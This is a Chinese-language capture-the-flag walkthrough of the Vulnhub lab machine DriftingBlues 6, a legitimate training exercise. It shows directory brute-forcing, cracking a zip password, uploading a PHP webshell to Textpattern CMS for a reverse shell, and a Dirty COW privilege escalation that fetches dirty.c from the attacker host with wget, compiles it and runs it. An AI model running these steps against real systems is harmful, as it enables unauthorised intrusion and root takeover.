Vulnhub靶机:driftingblues 6

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues6(10.0.2.22)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.22

使用nmap端口扫描发现靶机开放端口:80

打开网站没有发现可以利用的功能点,查看源码未发现隐藏数据

使用dirsearch工具爆破目录

复制代码
dirsearch -u http://10.0.2.22/ 
复制代码
dirsearch -u http://10.0.2.22/textpattern/ 
复制代码
dirsearch -u http://10.0.2.22/textpattern/textpattern/

访问/robots.txt

复制代码
User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

访问/textpattern/README可以看到该网站为Textpattern CMS版本为4.8.3

根据提示使用dirbuster工具进行目录爆破,爆破.zip


获取爆破得到的zip文件,解压,发现需要输入密码

使用fcrackzip工具进行暴力破解,得到密码:myspace4

复制代码
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip 

将压缩文件解压,得到用户名密码:mayer:lionheart

尝试登录网站,登录成功


三、漏洞利用

登录网站,查看网站各个功能点,发现存在文件上传功能,直接上传php webshell,上传成功

查看之前爆破的目录,有一个/textpattern/files/上传的webshell就放在在里面

直接访问webshell,反弹shell成功

四、提权

获取交互式shell

复制代码
python -c 'import pty; pty.spawn("/bin/bash")'

查看靶机系统内核版本uname -a,发现版本为:Linux 3.2.0-4

并且发现该靶机存在gcc环境which gcc

可以使用脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

在主机开启web服务,并在靶机下载提权脚本

复制代码
攻击机:
service apache2 start     

靶机:
wget http://10.0.2.15/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

创建一个具有root权限的用户firefart,密码为你自己设置的密码:firefart\root

切换为firefart用户

获取flag,只发现了一个flag

相关推荐
跃渊Yuey11 分钟前
【Linux】线程同步与互斥
linux·笔记
舰长11514 分钟前
linux 实现文件共享的实现方式比较
linux·服务器·网络
zmjjdank1ng28 分钟前
Linux 输出重定向
linux·运维
路由侠内网穿透.30 分钟前
本地部署智能家居集成解决方案 ESPHome 并实现外部访问( Linux 版本)
linux·运维·服务器·网络协议·智能家居
VekiSon1 小时前
Linux内核驱动——基础概念与开发环境搭建
linux·运维·服务器·c语言·arm开发
zl_dfq1 小时前
Linux 之 【进程信号】(signal、kill、raise、abort、alarm、Core Dump核心转储机制)
linux
Ankie Wan1 小时前
cgroup(Control Group)是 Linux 内核提供的一种机制,用来“控制、限制、隔离、统计”进程对系统资源的使用。
linux·容器·cgroup·lxc
skywalk81632 小时前
尝试在openi启智社区的dcu环境安装ollama最新版0.15.2(失败)
linux·运维·服务器·ollama
zhengfei6112 小时前
AutoPentestX – Linux 自动化渗透测试和漏洞报告工具
linux·运维·自动化
我材不敲代码2 小时前
在Linux系统上安装MySQL
linux·运维·服务器